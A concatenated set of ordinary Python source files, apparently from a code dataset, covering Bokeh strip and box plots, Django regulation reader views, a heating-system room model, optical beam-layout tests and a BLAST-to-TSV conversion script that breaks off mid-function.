y1="bottom_whisker",
**whisker_kwargs,
)
if whisker_caps:
p.vbar(
source=source_box,
x="cat",
bottom="top_whisker",
top="top_whisker",
width=box_width / 4,
**whisker_kwargs,
)
p.vbar(
source=source_box,
x="cat",
bottom="bottom_whisker",
top="bottom_whisker",
width=box_width / 4,
**whisker_kwargs,
)
p.vbar(
source=source_box,
x="cat",
bottom="bottom",
top="top",
width=box_width,
**box_kwargs,
)
p.vbar(
source=source_box,
x="cat",
bottom="middle",
top="middle",
width=box_width,
**median_kwargs,
)
if display_points:
marker_fun(source=source_outliers, x="cat", y=q, **outlier_kwargs)
p.xgrid.grid_line_color = None
return p
def stripbox(
data=None,
q=None,
cats=None,
q_axis="x",
palette=None,
order=None,
p=None,
show_legend=False,
top_level="strip",
color_column=None,
parcoord_column=None,
tooltips=None,
marker="circle",
jitter=False,
marker_kwargs=None,
jitter_kwargs=None,
parcoord_kwargs=None,
whisker_caps=True,
display_points=True,
min_data=5,
box_kwargs=None,
median_kwargs=None,
whisker_kwargs=None,
horizontal=None,
val=None,
**kwargs,
):
"""
Make a strip plot with a box plot as annotation.
Parameters
----------
data : Pandas DataFrame, 1D Numpy array, or xarray
DataFrame containing tidy data for plotting. If a Numpy array,
a single category is assumed and a strip plot generated from
data.
q : hashable
Name of column to use as quantitative variable if `data` is a
Pandas DataFrame. Otherwise, `q` is used as the quantitative
axis label.
cats : hashable or list of hashables
Name of column(s) to use as categorical variable(s).
q_axis : str, either 'x' or 'y', default 'x'
Axis along which the quantitative value varies.
palette : list of strings of hex colors, or single hex string
If a list, color palette to use. If a single string representing
a hex color, all glyphs are colored with that color. Default is
colorcet.b_glasbey_category10 from the colorcet package.
order : list or None
If not None, must be a list of unique group names when the input
data frame is grouped by `cats`. The order of the list specifies
the ordering of the categorical variables on the categorical
axis and legend. If None, the categories appear in the order in
which they appeared in the inputted data frame.
p : bokeh.plotting.Figure instance, or None (default)
If None, create a new figure. Otherwise, populate the existing
figure `p`.
top_level : str, default 'strip'
If 'box', the box plot is overlaid. If 'strip', the strip plot
is overlaid.
show_legend : bool, default False
If True, display legend.
color_column : hashable, default None
Column of `data` to use in determining color of glyphs. If None,
then `cats` is used.
parcoord_column : hashable, default None
Column of `data` to use to construct a parallel coordinate plot.
Data points with like entries in the parcoord_column are
connected with lines in the strip plot.
tooltips : list of 2-tuples
Specification for tooltips as per Bokeh specifications. For
example, if we want `col1` and `col2` tooltips, we can use
`tooltips=[('label 1': '@col1'), ('label 2': '@col2')]`.
marker : str, default 'circle'
Name of marker to be used in the plot (ignored if `formal` is
False). Must be one of['asterisk', 'circle', 'circle_cross',
'circle_x', 'cross', 'dash', 'diamond', 'diamond_cross', 'hex',
'inverted_triangle', 'square', 'square_cross', 'square_x',
'triangle', 'x']
jitter : bool, default False
If True, apply a jitter transform to the glyphs.
marker_kwargs : dict
Keyword arguments to pass when adding markers to the plot.
["x", "y", "source", "cat", "legend"] are note allowed because
they are determined by other inputs.
jitter_kwargs : dict
Keyword arguments to be passed to `bokeh.transform.jitter()`. If
not specified, default is
`{'distribution': 'normal', 'width': 0.1}`. If the user
specifies `{'distribution': 'uniform'}`, the `'width'` entry is
adjusted to 0.4.
whisker_caps : bool, default True
If True, put caps on whiskers. If False, omit caps.
min_data : int, default 5
Minimum number of data points in a given category in order to
make a box and whisker. Otherwise, individual data points are
plotted as in a strip plot.
box_kwargs : dict, default None
A dictionary of kwargs to be passed into `p.hbar()` or
`p.vbar()` when constructing the boxes for the box plot.
median_kwargs : dict, default None
A dictionary of kwargs to be passed into `p.hbar()` or
`p.vbar()` when constructing the median line for the box plot.
whisker_kwargs : dict, default None
A dictionary of kwargs to be passed into `p.segment()`
when constructing the whiskers for the box plot.
horizontal : bool or None, default None
Deprecated. Use `q_axis`.
val : hashable
Deprecated, use `q`.
kwargs
Any kwargs to be passed to `bokeh.plotting.figure()` when
instantiating the figure.
Returns
-------
output : bokeh.plotting.Figure instance
Plot populated with a strip plot.
"""
# Protect against mutability of dicts
box_kwargs = copy.copy(box_kwargs)
median_kwargs = copy.copy(median_kwargs)
whisker_kwargs = copy.copy(whisker_kwargs)
jitter_kwargs = copy.copy(jitter_kwargs)
marker_kwargs = copy.copy(marker_kwargs)
parcoord_kwargs = copy.copy(parcoord_kwargs)
# Set defaults
if box_kwargs is None:
box_kwargs = dict(line_color="gray", fill_alpha=0)
if "color" not in box_kwargs and "line_color" not in box_kwargs:
box_kwargs["line_color"] = "gray"
if "fill_alpha" not in box_kwargs:
box_kwargs["fill_alpha"] = 0
if median_kwargs is None:
median_kwargs = dict(line_color="gray")
if "color" not in box_kwargs and "line_color" not in median_kwargs:
median_kwargs["line_color"] = "gray"
if whisker_kwargs is None:
whisker_kwargs = dict(line_color="gray")
if "color" not in box_kwargs and "line_color" not in whisker_kwargs:
whisker_kwargs["line_color"] = "gray"
if top_level == "box":
p = strip(
data=data,
q=q,
cats=cats,
q_axis=q_axis,
palette=palette,
order=order,
p=p,
show_legend=show_legend,
color_column=color_column,
parcoord_column=parcoord_column,
tooltips=tooltips,
marker=marker,
jitter=jitter,
marker_kwargs=marker_kwargs,
jitter_kwargs=jitter_kwargs,
parcoord_kwargs=parcoord_kwargs,
horizontal=horizontal,
val=val,
**kwargs,
)
p = box(
data=data,
q=q,
cats=cats,
q_axis=q_axis,
palette=palette,
order=order,
p=p,
display_points=False,
whisker_caps=whisker_caps,
min_data=min_data,
box_kwargs=box_kwargs,
median_kwargs=median_kwargs,
whisker_kwargs=whisker_kwargs,
horizontal=horizontal,
val=val,
)
elif top_level == "strip":
p = box(
data=data,
q=q,
cats=cats,
q_axis=q_axis,
palette=palette,
order=order,
p=p,
display_points=False,
whisker_caps=whisker_caps,
min_data=min_data,
box_kwargs=box_kwargs,
median_kwargs=median_kwargs,
whisker_kwargs=whisker_kwargs,
horizontal=horizontal,
val=val,
**kwargs,
)
p = strip(
data=data,
q=q,
cats=cats,
q_axis=q_axis,
palette=palette,
order=order,
p=p,
show_legend=show_legend,
color_column=color_column,
parcoord_column=parcoord_column,
tooltips=tooltips,
marker=marker,
jitter=jitter,
marker_kwargs=marker_kwargs,
jitter_kwargs=jitter_kwargs,
parcoord_kwargs=parcoord_kwargs,
horizontal=horizontal,
val=val,
)
else:
raise RuntimeError("Invalid `top_level`. Allowed values are 'box' and 'strip'.")
return p
def _get_cat_range(df, grouped, order, color_column, q_axis):
if order is None:
if isinstance(list(grouped.groups.keys())[0], tuple):
factors = tuple(
[tuple([str(k) for k in key]) for key in grouped.groups.keys()]
)
else:
factors = tuple([str(key) for key in grouped.groups.keys()])
else:
if type(order[0]) in [list, tuple]:
factors = tuple([tuple([str(k) for k in key]) for key in order])
else:
factors = tuple([str(entry) for entry in order])
if q_axis == "x":
cat_range = bokeh.models.FactorRange(*(factors[::-1]))
elif q_axis == "y":
cat_range = bokeh.models.FactorRange(*factors)
if color_column is None:
color_factors = factors
else:
color_factors = tuple(sorted(list(df[color_column].unique().astype(str))))
return cat_range, factors, color_factors
def _cat_figure(df, grouped, q, order, color_column, q_axis, kwargs):
cat_range, factors, color_factors = _get_cat_range(
df, grouped, order, color_column, q_axis
)
kwargs = utils._fig_dimensions(kwargs)
if q_axis == "x":
if "x_axis_label" not in kwargs:
kwargs["x_axis_label"] = q
if "y_axis_type" in kwargs:
warnings.warn("`y_axis_type` specified for categorical axis. Ignoring.")
del kwargs["y_axis_type"]
kwargs["y_range"] = cat_range
elif q_axis == "y":
if "y_axis_label" not in kwargs:
kwargs["y_axis_label"] = q
if "x_axis_type" in kwargs:
warnings.warn("`x_axis_type` specified for categorical axis. Ignoring.")
del kwargs["x_axis_type"]
kwargs["x_range"] = cat_range
return bokeh.plotting.figure(**kwargs), factors, color_factors
def _cat_source(df, cats, cols, color_column):
cat_source, labels = utils._source_and_labels_from_cats(df, cats)
if type(cols) in [list, tuple, pd.core.indexes.base.Index]:
source_dict = {col: list(df[col].values) for col in cols}
else:
source_dict = {cols: list(df[cols].values)}
source_dict["cat"] = cat_source
if color_column in [None, "cat"]:
source_dict["__label"] = labels
else:
source_dict["__label"] = list(df[color_column].astype(str).values)
source_dict[color_column] = list(df[color_column].astype(str).values)
return bokeh.models.ColumnDataSource(source_dict)
def _parcoord_source(data, q, cats, q_axis, parcoord_column, factors):
if type(cats) not in [list, tuple]:
cats = [cats]
tuple_factors = False
else:
tuple_factors = True
grouped_parcoord = data.groupby(parcoord_column)
xs = []
ys = []
for t, g in grouped_parcoord:
xy = []
for _, r in g.iterrows():
if tuple_factors:
xy.append([tuple([r[cat] for cat in cats]), r[q]])
else:
xy.append([r[cats[0]], r[q]])
if len(xy) > 1:
xy.sort(key=lambda a: factors.index(a[0]))
xs_pc = []
ys_pc = []
for pair in xy:
xs_pc.append(pair[0])
ys_pc.append(pair[1])
if q_axis == "y":
xs.append(xs_pc)
ys.append(ys_pc)
else:
xs.append(ys_pc)
ys.append(xs_pc)
return bokeh.models.ColumnDataSource(dict(xs=xs, ys=ys))
def _outliers(data, min_data):
if len(data) >= min_data:
bottom, middle, top = np.percentile(data, [25, 50, 75])
iqr = top - bottom
outliers = data[(data > top + 1.5 * iqr) | (data < bottom - 1.5 * iqr)]
return outliers
else:
return data
def _box_and_whisker(data, min_data):
if len(data) >= min_data:
middle = data.median()
bottom = data.quantile(0.25)
top = data.quantile(0.75)
iqr = top - bottom
top_whisker = max(data[data <= top + 1.5 * iqr].max(), top)
bottom_whisker = min(data[data >= bottom - 1.5 * iqr].min(), bottom)
return pd.Series(
{
"middle": middle,
"bottom": bottom,
"top": top,
"top_whisker": top_whisker,
"bottom_whisker": bottom_whisker,
}
)
else:
return pd.Series(
{
"middle": np.nan,
"bottom": np.nan,
"top": np.nan,
"top_whisker": np.nan,
"bottom_whisker": np.nan,
}
)
def _box_source(df, cats, q, cols, min_data):
"""Construct a data frame for making box plot."""
# Need to reset index for use in slicing outliers
df_source = df.reset_index(drop=True)
if cats is None:
grouped = df_source
else:
grouped = df_source.groupby(cats, sort=False)
# Data frame for boxes and whiskers
df_box = grouped[q].apply(_box_and_whisker, min_data).unstack().reset_index()
df_box = df_box.dropna()
source_box = _cat_source(
df_box, cats, ["middle", "bottom", "top", "top_whisker", "bottom_whisker"], None
)
# Data frame for outliers
s_outliers = grouped[q].apply(_outliers, min_data)
# If no cat has enough data, just use everything as an "outlier"
if len(s_outliers) == len(df_source):
df_outliers = df_source.copy()
inds = df_source.index
else:
df_outliers = s_outliers.reset_index()
inds = s_outliers.index.get_level_values(-1)
df_outliers.index = inds
df_outliers[cols] = df_source.loc[inds, cols]
source_outliers = _cat_source(df_outliers, cats, cols, None)
return source_box, source_outliers
|
[
"numpy.percentile",
"warnings.warn",
"copy.copy",
"pandas.Series"
] |
[((3977, 4001), 'copy.copy', 'copy.copy', (['jitter_kwargs'], {}), '(jitter_kwargs)\n', (3986, 4001), False, 'import copy\n'), ((4022, 4046), 'copy.copy', 'copy.copy', (['marker_kwargs'], {}), '(marker_kwargs)\n', (4031, 4046), False, 'import copy\n'), ((12267, 12288), 'copy.copy', 'copy.copy', (['box_kwargs'], {}), '(box_kwargs)\n', (12276, 12288), False, 'import copy\n'), ((12309, 12333), 'copy.copy', 'copy.copy', (['median_kwargs'], {}), '(median_kwargs)\n', (12318, 12333), False, 'import copy\n'), ((12355, 12380), 'copy.copy', 'copy.copy', (['whisker_kwargs'], {}), '(whisker_kwargs)\n', (12364, 12380), False, 'import copy\n'), ((12402, 12427), 'copy.copy', 'copy.copy', (['outlier_kwargs'], {}), '(outlier_kwargs)\n', (12411, 12427), False, 'import copy\n'), ((23815, 23836), 'copy.copy', 'copy.copy', (['box_kwargs'], {}), '(box_kwargs)\n', (23824, 23836), False, 'import copy\n'), ((23857, 23881), 'copy.copy', 'copy.copy', (['median_kwargs'], {}), '(median_kwargs)\n', (23866, 23881), False, 'import copy\n'), ((23903, 23928), 'copy.copy', 'copy.copy', (['whisker_kwargs'], {}), '(whisker_kwargs)\n', (23912, 23928), False, 'import copy\n'), ((23949, 23973), 'copy.copy', 'copy.copy', (['jitter_kwargs'], {}), '(jitter_kwargs)\n', (23958, 23973), False, 'import copy\n'), ((23994, 24018), 'copy.copy', 'copy.copy', (['marker_kwargs'], {}), '(marker_kwargs)\n', (24003, 24018), False, 'import copy\n'), ((24041, 24067), 'copy.copy', 'copy.copy', (['parcoord_kwargs'], {}), '(parcoord_kwargs)\n', (24050, 24067), False, 'import copy\n'), ((12542, 12687), 'warnings.warn', 'warnings.warn', (['f"""`display_outliers` is deprecated. Use `display_points`. Using `display_points={display_outliers}."""', 'DeprecationWarning'], {}), "(\n f'`display_outliers` is deprecated. Use `display_points`. Using `display_points={display_outliers}.'\n , DeprecationWarning)\n", (12555, 12687), False, 'import warnings\n'), ((30635, 30668), 'numpy.percentile', 'np.percentile', (['data', '[25, 50, 75]'], {}), '(data, [25, 50, 75])\n', (30648, 30668), True, 'import numpy as np\n'), ((31189, 31314), 'pandas.Series', 'pd.Series', (["{'middle': middle, 'bottom': bottom, 'top': top, 'top_whisker': top_whisker,\n 'bottom_whisker': bottom_whisker}"], {}), "({'middle': middle, 'bottom': bottom, 'top': top, 'top_whisker':\n top_whisker, 'bottom_whisker': bottom_whisker})\n", (31198, 31314), True, 'import pandas as pd\n'), ((31453, 31568), 'pandas.Series', 'pd.Series', (["{'middle': np.nan, 'bottom': np.nan, 'top': np.nan, 'top_whisker': np.nan,\n 'bottom_whisker': np.nan}"], {}), "({'middle': np.nan, 'bottom': np.nan, 'top': np.nan, 'top_whisker':\n np.nan, 'bottom_whisker': np.nan})\n", (31462, 31568), True, 'import pandas as pd\n'), ((14160, 14235), 'warnings.warn', 'warnings.warn', (['"""\'height\' entry in `box_kwargs` ignored; using `box_width`."""'], {}), '("\'height\' entry in `box_kwargs` ignored; using `box_width`.")\n', (14173, 14235), False, 'import warnings\n'), ((14329, 14403), 'warnings.warn', 'warnings.warn', (['"""\'width\' entry in `box_kwargs` ignored; using `box_width`."""'], {}), '("\'width\' entry in `box_kwargs` ignored; using `box_width`.")\n', (14342, 14403), False, 'import warnings\n'), ((28376, 28448), 'warnings.warn', 'warnings.warn', (['"""`y_axis_type` specified for categorical axis. Ignoring."""'], {}), "('`y_axis_type` specified for categorical axis. Ignoring.')\n", (28389, 28448), False, 'import warnings\n'), ((28679, 28751), 'warnings.warn', 'warnings.warn', (['"""`x_axis_type` specified for categorical axis. Ignoring."""'], {}), "('`x_axis_type` specified for categorical axis. Ignoring.')\n", (28692, 28751), False, 'import warnings\n')]
|
from django.views.generic.base import (
TemplateView,
View,
)
from django.http import Http404
from django.urls import reverse
from django.http import HttpResponseRedirect
from regulations.generator import api_reader
from regulations.views.mixins import CitationContextMixin
from regulations.views.utils import find_subpart
from regulations.views.errors import NotInSubpart
class ReaderView(CitationContextMixin, TemplateView):
template_name = 'regulations/reader.html'
sectional_links = True
client = api_reader.ApiReader()
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
reg_version = context["version"]
reg_part = context["part"]
reg_title = context["title"]
tree = self.client.part(reg_version, reg_title, reg_part)
versions = self.get_versions(reg_title, reg_part)
parts = self.client.effective_title_parts(reg_version, reg_title)
document = tree['document']
toc = tree['toc']
part_label = toc['label_description']
c = {
'tree': self.get_content(context, document, toc),
'title': reg_title,
'reg_part': reg_part,
'part_label': part_label,
'toc': toc,
'parts': parts,
'versions': versions,
}
return {**context, **c}
def get_versions(self, title, part):
versions = self.client.regversions(title, part)
if versions is None:
raise Http404
return versions
def get_content(self, context, document, toc):
raise NotImplementedError()
class PartReaderView(ReaderView):
def get_content(self, context, document, structure):
return document
class SubpartReaderView(ReaderView):
def get_content(self, context, document, toc):
# using tree['structure'] find subpart requested then extract that data
subpart = context['subpart']
subpart_index = -1
for i in range(len(toc['children'])):
child = toc['children'][i]
if 'type' in child and 'identifier' in child:
if child['type'] == 'subpart' and child['identifier'][0] == subpart:
subpart_index = i
if subpart_index == -1:
raise Http404
return document['children'][subpart_index]
class SectionReaderView(View):
def get(self, request, *args, **kwargs):
url_kwargs = {
"title": kwargs.get("title"),
"part": kwargs.get("part"),
"version": kwargs.get("version"),
}
client = api_reader.ApiReader()
if url_kwargs['version'] is None:
versions = client.regversions(kwargs.get("title"), url_kwargs['part'])
if versions is None:
raise Http404
url_kwargs['version'] = versions[0]['date']
try:
toc = client.toc(url_kwargs['version'], kwargs.get("title"), url_kwargs['part'])['toc']
subpart = find_subpart(kwargs.get("section"), toc)
if subpart is not None:
url_kwargs["subpart"] = subpart
except NotInSubpart:
pass
url = reverse("reader_view", kwargs=url_kwargs)
return HttpResponseRedirect(url)
|
[
"django.urls.reverse",
"django.http.HttpResponseRedirect",
"regulations.generator.api_reader.ApiReader"
] |
[((527, 549), 'regulations.generator.api_reader.ApiReader', 'api_reader.ApiReader', ([], {}), '()\n', (547, 549), False, 'from regulations.generator import api_reader\n'), ((2669, 2691), 'regulations.generator.api_reader.ApiReader', 'api_reader.ApiReader', ([], {}), '()\n', (2689, 2691), False, 'from regulations.generator import api_reader\n'), ((3260, 3301), 'django.urls.reverse', 'reverse', (['"""reader_view"""'], {'kwargs': 'url_kwargs'}), "('reader_view', kwargs=url_kwargs)\n", (3267, 3301), False, 'from django.urls import reverse\n'), ((3317, 3342), 'django.http.HttpResponseRedirect', 'HttpResponseRedirect', (['url'], {}), '(url)\n', (3337, 3342), False, 'from django.http import HttpResponseRedirect\n')]
|
# Helper for testing.
#
# <NAME> [http://eli.thegreenplace.net]
# This code is in the public domain.
import sys
import time
def main():
count = 1
while True:
sys.stdout.write(f'{count} ')
if count % 20 == 0:
sys.stdout.write('\n')
time.sleep(0.05)
count += 1
if __name__ == '__main__':
main()
|
[
"sys.stdout.write",
"time.sleep"
] |
[((176, 205), 'sys.stdout.write', 'sys.stdout.write', (['f"""{count} """'], {}), "(f'{count} ')\n", (192, 205), False, 'import sys\n'), ((277, 293), 'time.sleep', 'time.sleep', (['(0.05)'], {}), '(0.05)\n', (287, 293), False, 'import time\n'), ((246, 268), 'sys.stdout.write', 'sys.stdout.write', (['"""\n"""'], {}), "('\\n')\n", (262, 268), False, 'import sys\n')]
|
"""Groups everything related to a room."""
from datetime import datetime
from typing import List, Optional
import attr
from . import ActiveMode, Component, Function, OperatingModes, constants
@attr.s
class Device:
"""This is a physical device inside a :class:`Room`. It can be a VR50
VR51 or VR52.
Args:
name (str): Name of the device, this is set by the mobile app.
sgtin (str): The is the serial number of the device.
device_type (str): Device type (VR51 = 'VALVE').
battery_low (bool): Indicate if the device is running low battery.
radio_out_of_reach (bool): Indicate if the device is connected to the
system.
"""
name = attr.ib(type=str)
sgtin = attr.ib(type=str)
device_type = attr.ib(type=str)
battery_low = attr.ib(type=bool)
radio_out_of_reach = attr.ib(type=bool)
@attr.s
class Room(Function, Component):
"""This is representing a room from the system.
Note:
The boost function - *the boost function is activated by pressing the
temperature selector. This means that the heating valves on the
assigned radiator thermostats are immediately opened 80% for 5
minutes* - is not reflected into the API.
Args:
humidity (float): In case of a VR51 is inside the room, you can get
humidity through the API.
child_lock (bool): Indicate if the device is locked, meaning you cannot
use the buttons on the device.
window_open (bool): Indicate if a window is open in the room. Of
course, this is data interpretation from vaillant API.
devices (List[Device]): List of :class:`Device` inside the room.
"""
MODES = [
OperatingModes.OFF,
OperatingModes.MANUAL,
OperatingModes.AUTO,
OperatingModes.QUICK_VETO,
]
"""List of mode that are applicable to rooms component."""
MIN_TARGET_TEMP = constants.FROST_PROTECTION_TEMP
"""Min `target temperature` that can be apply to a room."""
MAX_TARGET_TEMP = constants.THERMOSTAT_MAX_TEMP
"""Max `target temperature` that can be apply to a room."""
target_low = attr.ib(default=None, init=False)
humidity = attr.ib(type=Optional[float], default=None)
child_lock = attr.ib(type=bool, default=None)
window_open = attr.ib(type=bool, default=None)
devices = attr.ib(type=List[Device], default=None)
@property
def active_mode(self) -> ActiveMode:
"""ActiveMode: Get the :class:`~pymultimatic.model.mode.ActiveMode`
for this function. All operating modes are handled,
**but not quick veto nor quick mode.**
"""
if self.quick_veto:
mode = ActiveMode(self.quick_veto.target, OperatingModes.QUICK_VETO)
elif self.operating_mode == OperatingModes.AUTO:
setting = self.time_program.get_for(datetime.now())
mode = ActiveMode(setting.target_temperature, OperatingModes.AUTO, setting.setting)
elif self.operating_mode == OperatingModes.OFF:
mode = ActiveMode(self.MIN_TARGET_TEMP, OperatingModes.OFF)
else: # MODE_MANUAL
mode = ActiveMode(self.target_high, OperatingModes.MANUAL)
return mode
def _active_mode(self) -> ActiveMode:
pass
|
[
"attr.ib",
"datetime.datetime.now"
] |
[((703, 720), 'attr.ib', 'attr.ib', ([], {'type': 'str'}), '(type=str)\n', (710, 720), False, 'import attr\n'), ((733, 750), 'attr.ib', 'attr.ib', ([], {'type': 'str'}), '(type=str)\n', (740, 750), False, 'import attr\n'), ((769, 786), 'attr.ib', 'attr.ib', ([], {'type': 'str'}), '(type=str)\n', (776, 786), False, 'import attr\n'), ((805, 823), 'attr.ib', 'attr.ib', ([], {'type': 'bool'}), '(type=bool)\n', (812, 823), False, 'import attr\n'), ((849, 867), 'attr.ib', 'attr.ib', ([], {'type': 'bool'}), '(type=bool)\n', (856, 867), False, 'import attr\n'), ((2175, 2208), 'attr.ib', 'attr.ib', ([], {'default': 'None', 'init': '(False)'}), '(default=None, init=False)\n', (2182, 2208), False, 'import attr\n'), ((2224, 2267), 'attr.ib', 'attr.ib', ([], {'type': 'Optional[float]', 'default': 'None'}), '(type=Optional[float], default=None)\n', (2231, 2267), False, 'import attr\n'), ((2285, 2317), 'attr.ib', 'attr.ib', ([], {'type': 'bool', 'default': 'None'}), '(type=bool, default=None)\n', (2292, 2317), False, 'import attr\n'), ((2336, 2368), 'attr.ib', 'attr.ib', ([], {'type': 'bool', 'default': 'None'}), '(type=bool, default=None)\n', (2343, 2368), False, 'import attr\n'), ((2383, 2423), 'attr.ib', 'attr.ib', ([], {'type': 'List[Device]', 'default': 'None'}), '(type=List[Device], default=None)\n', (2390, 2423), False, 'import attr\n'), ((2890, 2904), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (2902, 2904), False, 'from datetime import datetime\n')]
|
# -*- coding: utf-8 -*-
"""
"""
from __future__ import division, print_function, unicode_literals
import pytest
from phasor.utilities.mpl.autoniceplot import (
#AutoPlotSaver,
#mplfigB,
asavefig,
)
import os.path as path
from phasor import alm
asavefig.org_subfolder = path.join(path.dirname(__file__), 'tests')
from IPython.lib.pretty import pprint as print
def test_layout(plot):
sys = alm.RootSystem(
env_principle_target = 'q1',
)
sys.own.q1 = alm.BeamTarget(
loc_m = 0,
q_raw = alm.ComplexBeamParam.from_Z_ZR(0, .04),
)
sys.own.lens1 = alm.ThinLens(
f_m = .1,
loc_in = 7,
)
sys.own.q2 = alm.BeamTarget(
loc_m = .4,
q_raw = alm.ComplexBeamParam.from_Z_ZR(0, .04),
)
sys.components
print(sys.measurements.target_idx('q1'))
if plot:
sys.plot('test_layout')
return sys
def test_regenerate(plot):
sys = test_layout(plot = False)
sys2 = sys.regenerate()
print(sys2.q1.loc_m.val)
print(sys2.q2.loc_m.val)
print(sys2.lens1.loc_m.val)
sys.component_pos_pairings
sys2.component_pos_pairings
assert(set(sys._registry_inserted.keys()) == set(sys2._registry_inserted.keys()))
assert(set(sys._registry_children.keys()) == set(sys2._registry_children.keys()))
#TODO make the plot optional
if plot:
sys.plot('test_regen')
print(sys2._registry_children)
print(sys2._registry_inserted)
return
def test_regenerate_auto(plot):
sys = test_layout(plot = False)
print("SYS INS: ", sys._registry_inserted)
sys2 = sys.regenerate()
print("SYS INS2: ", sys2._registry_inserted_pre)
sys.component_pos_pairings
sys2.component_pos_pairings
assert(set(sys._registry_inserted.keys()) == set(sys2._registry_inserted.keys()))
assert(set(sys._registry_children.keys()) == set(sys2._registry_children.keys()))
if plot:
sys.plot('test_regen_auto')
print(sys2._registry_children)
print(sys2._registry_inserted)
return
def test_regenerate_auto_ooa(plot):
sys = test_layout(plot = False)
sys2 = sys.regenerate()
sys.component_pos_pairings
sys2.component_pos_pairings
assert(set(sys._registry_inserted.keys()) == set(sys2._registry_inserted.keys()))
assert(set(sys._registry_children.keys()) == set(sys2._registry_children.keys()))
print('OOA1')
print(sys.ctree)
print('OOA2')
print(sys2.ctree)
sys2.print_yaml()
return
if __name__=='__main__':
#print("LAYOUT")
#test_layout(True)
#print("REGEN")
#test_regenerate(True)
print("REGEN_AUTO")
test_regenerate_auto_ooa(True)
|
[
"os.path.dirname",
"phasor.alm.ThinLens",
"IPython.lib.pretty.pprint",
"phasor.alm.RootSystem",
"phasor.alm.ComplexBeamParam.from_Z_ZR"
] |
[((294, 316), 'os.path.dirname', 'path.dirname', (['__file__'], {}), '(__file__)\n', (306, 316), True, 'import os.path as path\n'), ((410, 451), 'phasor.alm.RootSystem', 'alm.RootSystem', ([], {'env_principle_target': '"""q1"""'}), "(env_principle_target='q1')\n", (424, 451), False, 'from phasor import alm\n'), ((604, 635), 'phasor.alm.ThinLens', 'alm.ThinLens', ([], {'f_m': '(0.1)', 'loc_in': '(7)'}), '(f_m=0.1, loc_in=7)\n', (616, 635), False, 'from phasor import alm\n'), ((1001, 1025), 'IPython.lib.pretty.pprint', 'print', (['sys2.q1.loc_m.val'], {}), '(sys2.q1.loc_m.val)\n', (1006, 1025), True, 'from IPython.lib.pretty import pprint as print\n'), ((1030, 1054), 'IPython.lib.pretty.pprint', 'print', (['sys2.q2.loc_m.val'], {}), '(sys2.q2.loc_m.val)\n', (1035, 1054), True, 'from IPython.lib.pretty import pprint as print\n'), ((1059, 1086), 'IPython.lib.pretty.pprint', 'print', (['sys2.lens1.loc_m.val'], {}), '(sys2.lens1.loc_m.val)\n', (1064, 1086), True, 'from IPython.lib.pretty import pprint as print\n'), ((1404, 1434), 'IPython.lib.pretty.pprint', 'print', (['sys2._registry_children'], {}), '(sys2._registry_children)\n', (1409, 1434), True, 'from IPython.lib.pretty import pprint as print\n'), ((1439, 1469), 'IPython.lib.pretty.pprint', 'print', (['sys2._registry_inserted'], {}), '(sys2._registry_inserted)\n', (1444, 1469), True, 'from IPython.lib.pretty import pprint as print\n'), ((1554, 1596), 'IPython.lib.pretty.pprint', 'print', (['"""SYS INS: """', 'sys._registry_inserted'], {}), "('SYS INS: ', sys._registry_inserted)\n", (1559, 1596), True, 'from IPython.lib.pretty import pprint as print\n'), ((1629, 1677), 'IPython.lib.pretty.pprint', 'print', (['"""SYS INS2: """', 'sys2._registry_inserted_pre'], {}), "('SYS INS2: ', sys2._registry_inserted_pre)\n", (1634, 1677), True, 'from IPython.lib.pretty import pprint as print\n'), ((1967, 1997), 'IPython.lib.pretty.pprint', 'print', (['sys2._registry_children'], {}), '(sys2._registry_children)\n', (1972, 1997), True, 'from IPython.lib.pretty import pprint as print\n'), ((2002, 2032), 'IPython.lib.pretty.pprint', 'print', (['sys2._registry_inserted'], {}), '(sys2._registry_inserted)\n', (2007, 2032), True, 'from IPython.lib.pretty import pprint as print\n'), ((2385, 2398), 'IPython.lib.pretty.pprint', 'print', (['"""OOA1"""'], {}), "('OOA1')\n", (2390, 2398), True, 'from IPython.lib.pretty import pprint as print\n'), ((2403, 2419), 'IPython.lib.pretty.pprint', 'print', (['sys.ctree'], {}), '(sys.ctree)\n', (2408, 2419), True, 'from IPython.lib.pretty import pprint as print\n'), ((2424, 2437), 'IPython.lib.pretty.pprint', 'print', (['"""OOA2"""'], {}), "('OOA2')\n", (2429, 2437), True, 'from IPython.lib.pretty import pprint as print\n'), ((2442, 2459), 'IPython.lib.pretty.pprint', 'print', (['sys2.ctree'], {}), '(sys2.ctree)\n', (2447, 2459), True, 'from IPython.lib.pretty import pprint as print\n'), ((2614, 2633), 'IPython.lib.pretty.pprint', 'print', (['"""REGEN_AUTO"""'], {}), "('REGEN_AUTO')\n", (2619, 2633), True, 'from IPython.lib.pretty import pprint as print\n'), ((538, 577), 'phasor.alm.ComplexBeamParam.from_Z_ZR', 'alm.ComplexBeamParam.from_Z_ZR', (['(0)', '(0.04)'], {}), '(0, 0.04)\n', (568, 577), False, 'from phasor import alm\n'), ((731, 770), 'phasor.alm.ComplexBeamParam.from_Z_ZR', 'alm.ComplexBeamParam.from_Z_ZR', (['(0)', '(0.04)'], {}), '(0, 0.04)\n', (761, 770), False, 'from phasor import alm\n')]
|
import logging, os, re, sys,shutil
from code.utils.basic_utils import check_output_and_run
from pprint import pprint
from joblib import Parallel, delayed
from lxml import etree, html
from glob import glob
import zipfile
import csv
import requests
from requests_toolbelt import MultipartEncoder
import time
from Bio import SeqIO
from natsort import natsorted
def xml2tsv(in_xml):
out_tsv = re.sub(r"xml$","tsv",in_xml)
if not os.path.exists(out_tsv):
logging.info("Converting %s into %s." % (in_xml,out_tsv))
xslt_root = etree.parse("config/bl_xml2argot.xsl")
transform = etree.XSLT(xslt_root)
bl_tree = etree.parse(in_xml)
result_txt = str(transform(bl_tree)).splitlines(True)
sel_lines = [ line if re.match(r"[0-9A-Za-z]",line) else "" for line in result_txt]
with open(out_tsv,"w") as outfile:
outfile.writelines(sel_lines)
outfile.close()
else:
logging.info("Not converting %s into %s. Output file exists" % (in_xml,out_tsv))
def concat_tsv(all_tmp_bl_files,argot_out):
with open(argot_out,"w+") as outfile:
for tmp_tsv in all_tmp_bl_files:
with open(tmp_tsv,"r") as infile:
outfile.write(infile.read())
infile.close()
def convert_blast(config):
workdir=config["input"]["gomap_dir"]+"/"
ncpus=int(config["input"]["cpus"])
tmp_bl_dir=workdir + config["data"]["mixed-method"]["preprocess"]["blast_out"]+"/temp"
argot_tsv_dir=workdir + config["data"]["mixed-method"]["argot2"]["preprocess"]["blast"]
